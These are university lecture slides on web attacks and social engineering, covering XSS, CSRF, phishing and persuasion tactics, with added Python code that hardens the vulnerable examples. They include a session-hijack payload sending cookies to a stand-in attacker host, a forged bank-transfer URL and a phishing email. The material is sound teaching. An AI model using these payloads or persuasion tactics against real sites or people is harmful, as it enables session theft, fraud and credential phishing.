Network Security AA 2015/2016
Vulnerabilities (b)
Dr. Luca Allodi
Dr. Luca Allodi - Network Security - University of Trento, DISI (AA 2015/2016)
Cross-site scripting (XSS)
• Among the most common, if not perhaps the most common, web-based attacks
• By exploiting this vulnerability, the attacker can modify the content delivered to a user’s browser
• The vulnerability is on the server, but the attack affects the user
Stats from NVD (Feb 2016)
XSS attacks
• Regardless of execution, are based on the implicit notion of trust that exists between a browser and a server
• The browser executes whatever the contacted website says
  • “Same-origin policy”
    • Applied also to browser cookies, JS execution, etc.
• The vulnerability allows the attacker to inject content on a web page
• When the victim’s browser loads the web page, it executes the injected content
• The browser cannot distinguish between legitimate and “malicious” instructions → all coming from a trusted source
Stored XSS (Persistent XSS)
• This XSS variant is stored on the remote server
  • E.g. a forum thread, a newsletter, a database
• Whenever a user retrieves a certain web page, the malicious content is delivered to their browser
1. Injection attack
The server stores the crafted instructions from the attacker and delivers them to users that ask for the content where the attack is stored
Reflected XSS (Non-persistent)
• The attacker somehow tricks the user into sending the forged input to the server
  • e.g. sends a link in a spam email
1. Attacker sends crafted link to user
2. User clicks link and sends request to server
3. Server replies with malicious content
Reflected XSS example
Web page code (index.php):
<?php
  // untrusted GET parameter echoed into the page without HTML encoding
  $name = $_GET['name'];
  echo "Welcome $name<br>";
  echo '<a href="http://legit-site.com/">Click to Download</a>';
?>
Attacker sends this URL to the victim:
index.php?name=guest<script>alert('attacked')</script>
Session hijack:
<a href=# onclick="document.location='http://attacker-site.com/xss.php?c='+escape(document.cookie);">Click to Download</a>
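The slide’s index.php rebuilt as a Python function beside a hardened version that HTML-encodes the untrusted parameter; this is an added example, not code from the slides, and the request values it renders are the slide’s own payloads.

```python
import html
import re

# Added example (not from the slides): the reflected-XSS page from the slide,
# mirrored in Python, beside a hardened rendering. The PHP equivalent of the
# fix is htmlspecialchars($name, ENT_QUOTES, 'UTF-8').

LEGIT_LINK = '<a href="http://legit-site.com/">Click to Download</a>'

# A raw <script> tag, or any tag carrying an inline on*= event handler
# (e.g. the onclick in the slide's session-hijack payload).
ACTIVE_MARKUP = re.compile(r"<script|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def render_vulnerable(name: str) -> str:
    """Mirrors the slide's index.php: $name lands in the HTML as-is."""
    return f"Welcome {name}<br>{LEGIT_LINK}"


def render_hardened(name: str) -> str:
    """Same page, but the parameter is encoded for an HTML text context.
    quote=True also encodes ' and ", so the value can neither open a tag
    nor break out of an attribute."""
    return f"Welcome {html.escape(name, quote=True)}<br>{LEGIT_LINK}"


def contains_active_content(rendered: str) -> bool:
    """Does the rendered HTML still contain injected active markup?
    (A browser parses the page; this regex only illustrates the difference
    between the two renderings on the slide's inputs.)"""
    return ACTIVE_MARKUP.search(rendered) is not None


if __name__ == "__main__":
    # Constructed inputs: an ordinary name and the slide's payload.
    for name in ("guest", "guest<script>alert('attacked')</script>"):
        print("vulnerable:", render_vulnerable(name))
        print("hardened:  ", render_hardened(name))
```

Encoding is context-specific: this protects a text node and quoted attributes, while a value placed inside a URL, a JavaScript block or a CSS block needs its own encoder.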
XSS - impacts
• disclosure of the user’s session cookie
  • Can be used to hijack the user’s session
• disclosure of end user files
• redirect the user to some other page or site
  • E.g. controlled by the attacker
  • Possible other attack vectors stored on that page
• modify web page content/information
  • e.g. modify button functionalities
• …
Cross-site request forgery
• Similar in principle to an XSS attack
  • Rather than exploiting the browser’s trust in server replies, it exploits the server’s trust in browser requests
• Attack happens on the server → server “changes state”
  • e.g. executes a server-side operation not intended by the user
Stats from NVD (Feb 2016)
CSRF
• Forged input to the server executes actions on the server → changes server status
• Usually exploits a user’s stored credentials to execute illegitimate actions on a website
  • Change email/password
  • Perform server operations (e.g. bank transfer)
• Example (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
  • Imagine a web bank that operates through HTTP GET arguments
    • GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1
  • Attacker can trick the user into sending a forged request
    • http://bank.com/transfer.do?acct=MARIA&amount=100000
    • e.g. embed the link in HTML source code
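The OWASP bank example above, as an added example that is not part of the slides: the GET-driven transfer handler next to a hardened one that only changes state on a POST carrying a session-bound synchronizer token. Requests, sessions and the server secret are constructed dicts and values standing in for a real web framework.

```python
import hashlib
import hmac
import secrets

# Added example (not from the slides). SERVER_SECRET is generated here; in
# a deployment it would be a persistent, per-server secret.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token_for(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(secret, session_id).
    The bank embeds it in its own transfer form; a page on another origin
    cannot read it (same-origin policy), so it cannot forge a valid request."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(request: dict, balances: dict) -> str:
    """Mirrors the slide: any request carrying the victim's session cookie is
    honoured, including a GET triggered by a link or <img> on another site."""
    if request["cookies"].get("session") is None:
        return "denied: not logged in"
    acct, amount = request["params"]["acct"], int(request["params"]["amount"])
    balances[acct] = balances.get(acct, 0) + amount
    return f"ok: {amount} to {acct}"


def transfer_hardened(request: dict, balances: dict) -> str:
    """State changes only on POST carrying a valid session-bound token."""
    session = request["cookies"].get("session")
    if session is None:
        return "denied: not logged in"
    if request["method"] != "POST":
        return "denied: state change requires POST"
    supplied = request["params"].get("csrf_token", "")
    # constant-time comparison so the token cannot be recovered via timing
    if not hmac.compare_digest(supplied, csrf_token_for(session)):
        return "denied: missing or invalid CSRF token"
    acct, amount = request["params"]["acct"], int(request["params"]["amount"])
    balances[acct] = balances.get(acct, 0) + amount
    return f"ok: {amount} to {acct}"


def forged_request(method: str = "GET") -> dict:
    """The slide's forged URL as Bob's browser would send it, cookie attached."""
    return {"method": method, "cookies": {"session": "bob-session"},
            "params": {"acct": "MARIA", "amount": "100000"}}


def legitimate_request() -> dict:
    """Bob's own transfer, submitted from the bank's form with its token."""
    return {"method": "POST", "cookies": {"session": "bob-session"},
            "params": {"acct": "BOB", "amount": "100",
                       "csrf_token": csrf_token_for("bob-session")}}
```

Current deployments pair such a token with SameSite cookies and an Origin/Referer check; the token alone is the part the slide’s example is missing.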
Common source of vulnerability
• SQL injection → SQL backend trusts unsanitized input
• Buffer overflow → System cannot distinguish between instructions and data, trusts the input to be correct
• XSS → the browser trusts the content sent by the server
• CSRF → the server trusts and executes the commands sent by the browser
Human vulnerabilities
“The biggest threat to the security of a company is not a computer virus, an unpatched hole in a key program or a badly installed firewall. In fact, the biggest threat could be you. What I found personally to be true was that it’s easier to manipulate people rather than technology. Most of the time organizations overlook that human element”
Kevin Mitnick
Phishing
• The attacker aims at obtaining the credentials of users of a website/service
  • other types of private information can be gathered too
    • Typically through more sophisticated “spear phishing” attacks
• Attacker creates a replica of the original website
  • Replica is published online
  • Link typically sent through spam emails, social networks
  • Recipient may be fooled into opening the link and entering their credentials as in the genuine website
• Credentials are of course sent to the attacker instead
Phishing – attacker tools
• Creating a working replica of a website is only as hard as creating a copy
• Attacker needs to modify some of its components
  • e.g. send form HTTP POST to a web server the attacker controls
• Advanced attackers may remove JS/third party components to prevent exposing the phishing website
• Advanced attackers vs script kiddies
  • Automated tools exist that do this for the attacker
    • Few hundreds of dollars on black markets
    • Essentially a recursive wget
Phishing example
Translation (including English reproduction of lexical and grammatical errors).
Warning: We noticed something unusual in a recent email account sign-in. To help maintaining secure, we requested a challenge higher security. click the link {link}, We kindly ask to review your activities recent and we will help you taking correcting measures.
Combining phishing and software vulnerabilities
• In this case it’s easy to notice that the domain I’m redirected to is not UniTn’s
• However, there exist vulnerabilities in browsers that allow the malicious website to spoof the address displayed in the address bar
• Example:
  • The web page is gfcv-altervista.org
  • The browser says it’s webmail.disi.unitn.it
Example of address spoofing
• Safari 8 vulnerability under OS X < 10.10.5
  • PoC → http://www.deusen.co.uk/items/iwhere.9500182225526788/
• Other similar vulnerabilities exist for IE and Chrome
• If the browser is vulnerable, the attacker can manipulate the address bar’s content to his/her liking
Social engineering
• Phishing is only an application of a wider set of attacks that exploit human nature to (usually) breach data confidentiality
• “Social engineering” identifies a set of techniques that attack weaknesses in human psychology
• The final goal is to persuade a human being into performing actions elicited by the attacker
• Situational theory of publics → why people would take action, or feel part of a collective
  • Problem recognition → subject thinks the problem is relevant to them
  • Active involvement → subject thinks they will suffer the consequences of the threat
  • Constraint recognition → subject thinks their actions are limited by factors outside of their control
Elaboration Likelihood Model (ELM)
• ELM describes the ways humans change their attitudes or decide to perform actions they would not perform without external stimuli
• Two routes to “persuasion”
  • Central route
    • Stimuli are weighted by the subject and the final decision is carefully elaborated
    • High amount of cognitive effort
      • Associated with “rational perfectly informed decisions” in economics
    • Persuasion happens through careful elaboration of information
  • Peripheral route
    • Communication that typically does not result in careful cognitive effort in understanding the message
    • Subject is convinced by under-analyzing apparently relevant “cues” that are in reality unrelated to the subject matter
    • Persuasion happens through “adjunct elements” to the communication
      • Likeability of subject, physical attractiveness, trust, …
Uses of the peripheral route
• Vastly used as a “cheap” route to convince people to perform an action
  • Buy a product
  • Subscribe to a service
  • Visit a location
  • …
• Especially effective when physical contact is not a factor
  • Marketing strategies often rely on this mechanism
    • A TV ad must convince you to buy a shampoo in 30 seconds
• Social engineering differs from marketing in that attacks typically do not try to sell products
  • Rather, social engineers must persuade victims to disclose sensitive or private information
Hacking a human
• Six factors affect the likelihood of human persuasion
1. Reciprocation
  • Subjects form implied or explicit obligations towards each other → Normative commitment
2. Consistency
  • Subjects tend to be consistent with previous decisions, even if all evidence shows that these were bad decisions → Continuance commitment
3. Social proof
  • Subjects tend to act similarly to their peers to “fit in” → Affective commitment
4. Likeability
  • Subjects tend to trust people they like, find convincing, or attractive
5. Authority
  • Subjects fear punishment (that an authority can impose) and will comply
6. Scarcity
  • Subjects will react quickly and possibly irrationally to stimuli when they believe that their freedom of choice is a function of time or resource availability
Normative commitment
• Subjects will perform an action because that’s customary or mandated by law or contract
• Based on the notion of reciprocation of benefits
  • When subjects receive something they value, they feel “cognitive dissonance”
    • Essentially a “bug” of human psychology
    • Faced when the subject must elaborate two contrasting forces or inputs simultaneously
    • Subject must elaborate evidence in contrast to his previous beliefs
    • E.g. “I do not need sun cream” → “here is a tester for you” → “thank you, I should probably buy some”
• Promises count as “something of value”
  • I promise you a valuable good at the sole cost of shipping
  • People tend to comply because they feel “gratitude” for the unsolicited proposal
Continuance commitment
• Subjects tend to maintain congruence in their attitudes and decisions even in the presence of evidence that these are bad
• Subjects tend to maintain cognitive consonance as opposed to facing cognitive dissonance
• In economics this is reflected in the concept of “loss aversion and sunk costs”
  • If an initial investment was bad, people will tend to keep on investing because they are convinced it will eventually pay off
  • Pay (small) escalating costs to win a teddy bear
• Upfront costs are low w.r.t. the promised benefit vs the cost of taking precautions (or opportunity costs)
  • People are willing to give away personal information for negligible benefits or discounts (even if they claim they are willing to pay a premium to preserve their privacy) [Acquisti 2003]
Affective commitment
• People are influenced by the opinion of those they esteem or like
• Decision of action taken to be part of a clique or a circle of peers
  • Widely used for marketing too
• Emotional bond with the interlocutor can be exploited to have the victim communicate personal details or perform certain actions
  • e.g. pretend you are on a vacation with a friend of the victim and ask for money to solve an emergency
  • Social networks make these inferences possible for the attacker
Liking and Trust
• Similarly to affective commitment, people are willing to be liked by those whom they like
  • Take action to obtain consent from those they like
• People tend to extend the “credibility” of subjects they perceive as successful beyond the reasonable boundaries of these subjects’ actual expertise
  • e.g. a famous actor that publicizes biscuits despite having no actual expertise or credibility as a baker, but only as an actor
• When physical/presence attraction is not a factor (e.g. email exchange), the likeability can emerge from a “friendly connection”
  • e.g. appeal to or elicit common traits
Authority
• People tend to respond to authority especially when in fear of the outcomes of not taking action
  • E.g. punishment or the cancellation of a privilege
    • “Your email account is going to be deleted if your password is not confirmed.”
• Obedience to authority is a very powerful tool to persuade people into particular actions or behaviors
• In some (occasionally very controversial) cases people will obey authority even against well-established moral values and ethics
Effects of authority – Milgram’s experiment
• Experiment in the 1960s @ Yale, replicated several times
• Subject A deceived into participating in an experiment where they had to “teach” subject B combinations of English terms
  • Subject B is in reality a collaborator of the experimenter
  • Whenever subject B gives the wrong answer, subject A must inflict an electrical shock to B
    • Voltage increases with the number of errors
  • No visual contact between A and B, but A can hear B screaming in pain for the shock
    • There is no actual shock, but A does not know
• To what extent will A collaborate?
  • 65% of subject As went all the way to the highest shock level (when B effectively stopped answering)
  • Subject As felt deeply concerned and stressed, expressed profound anxiety, had hysterical reactions
  • Yet, the experimenter’s (authority) power was enough to push them into continuing with the experiment in most cases
    1. “Please continue.”
    2. “The experiment requires that you continue.”
    3. “It is absolutely essential that you continue.”
    4. “You have no other choice, you must go on.”
Scarcity
• Similarly to fear, scarcity leads people to take quick, potentially uninformed decisions in fear of losing an opportunity that will either disappear in time or that is scarce in quantity
• Can be used by social engineers to elicit unwise decisions from the victims
  • Threaten that if no decision is taken quickly, the opportunity may fade away
  • Attacker poses a “constraint” on the freedom of choice of the victim
Social engineering steps
• Can distinguish between single and multiple-stage social engineering attacks
• Single stage attacks usually aim at collecting sensitive information about “general” targets
  • No specificity in the attack
  • e.g. attack all customers of mybank.com
Two (multiple) stage attacks
• Two-stage attacks involve an initial reconnaissance that gathers information needed for the second stage
• Used to increase the credibility of the attack
  • E.g. proper legal references, employee names, correct set of users in CC to the phishing email, etc.
  • Spear phishing against CEO/director/manager/person of interest
Steps in detail (first stage)
Columns: Pattern Phase / Typical Activities / Pattern Interactions

1. Research and Open Source Intelligence
  Typical activities:
    • Search for open source intelligence
    • Establish attack objectives
    • Identify opportune targets
  Pattern interactions:
    1.1 Attacker researches and strategizes about potential targets and specific objectives.

2. Planning and Preparation
  Typical activities:
    • Develop attack strategy including means to avoid detection and mitigation by UIT organization
    • Prepare phishing attack artifacts
  Pattern interactions:
    2.1 Attacker plans phishing attack and creates phishing artifacts (e.g., phishing email, mobile text message, phony website, malware to be implanted).

3. Phishing Operation
  Typical activities:
    • Release phishing artifact via email, cellphone, rogue website, or other means
    • Wait for a response
  Pattern interactions:
    3.1 Attacker initiates phishing attack through email, cellphone, rogue website, or other means.

4. Response and Information Capture
  Typical activities:
    • Gain access and/or privileges to obtain greater information reach
    • Implant malware to achieve information objectives
    • Identify other opportune UIT targets and internal system information, and capture guarded and sensitive information
  Pattern interactions:
    4.1 One or more targets unwittingly respond to phishing artifact and become a UIT.
    4.2 Attacker detects or is alerted to UIT response and obtains initial information directly from UIT data entry.
    4.3 Attacker implants malware on victim’s machine or network.
    4.4 Attacker obtains desired information via malware.
Source: Unintentional Insider Threats: Social Engineering. CERT Insider Threat Center. January 2014. http://resources.sei.cmu.edu/library/asset-view.cfm?assetID=77455
Steps in detail (second stage)
Columns: Pattern Phase / Typical Activities / Pattern Interactions

5. Re-planning and Preparation
  Typical activities:
    • Re-plan attack strategy including means to avoid detection and mitigation by UIT organization
    • Prepare spear phishing attack artifacts
  Pattern interactions:
    5.1 Attacker uses information captured in Step 4 above to replan follow-on steps for spear phishing attack. This may entail creation of new artifacts or specific attack approaches.

6. Spear Phishing Operation
  Typical activities:
    • Execute spear-phishing
    • Wait for a response
  Pattern interactions:
    6.1 Attacker initiates spear phishing attack.

7. Response and Information Capture
  Typical activities:
    • Gain access and/or privileges to obtain greater information reach
    • Exploit more specific insider targets: financial system, secure systems, etc.
  Pattern interactions:
    7.1 One or more high-value targets unwittingly respond to the spear phishing artifact and become a UIT.
    7.2 Phisher detects or is alerted to UIT response and obtains desired information directly from UIT data entry.

8. Attack Culmination and Exploitation
  Typical activities:
    • Use captured information to directly attack UIT or UIT’s organization to steal, manipulate, and/or destroy targeted assets
  Pattern interactions:
    8.1 Attacker uses desired information in direct attack on UIT or UIT’s organization to steal, manipulate, and/or destroy targeted assets.
Source: Unintentional Insider Threats: Social Engineering. CERT Insider Threat Center. January 2014. http://resources.sei.cmu.edu/library/asset-view.cfm?assetID=77455
Example: well engineered, 2-stage social engineering attack
• On 19th of May 2015 I received an email from somebody attaching a “receipt”. The email was in good Italian, and had seemingly meaningful law references regulating the emission of the receipt
• However, I was not expecting a receipt
  • I discarded it right away as an attack → trashed
• The next day, I receive this email:
Dear costumer, We kindly ask you to ignore the previous receipt and substitute it with the present, dated 24/03/2015. The receipt must be printed and archived by the receiving subject as prescribed by DRP 607/40 and subsequent changes, and by RM no. 450217, emitted on 30/07/1990
Best regards, Jarvis Bernard

Persuasion factors marked on the slide next to the email:
• continuance commitment (variation of)
• authority
• normative commitment

Almost fell for it..
Reported results are for the attachment of the first email. The second attachment gave the same results.
Reading List
• Arora, Ashish, et al. "Impact of vulnerability disclosure and patch availability - an empirical analysis." Third Workshop on the Economics of Information Security. Vol. 24. 2004.
• Miller, Charlie. "The legitimate vulnerability market: Inside the secretive world of 0-day exploit sales." In Sixth Workshop on the Economics of Information Security. 2007.
• http://phrack.org/issues/49/14.html
• OWASP resources
• Moore, Tyler, and Richard Clayton. "An Empirical Analysis of the Current State of Phishing Attack and Defence." WEIS. 2007.
• Workman, Michael. "Wisecrackers: A theory-grounded investigation of phishing and pretext social engineering threats to information security." Journal of the American Society for Information Science and Technology 59.4 (2008): 662-674.
• Acquisti, Alessandro, and Jens Grossklags. "Losses, gains, and hyperbolic discounting: An experimental approach to information security attitudes and behavior." 2nd Annual Workshop on Economics and Information Security - WEIS. Vol. 3. 2003.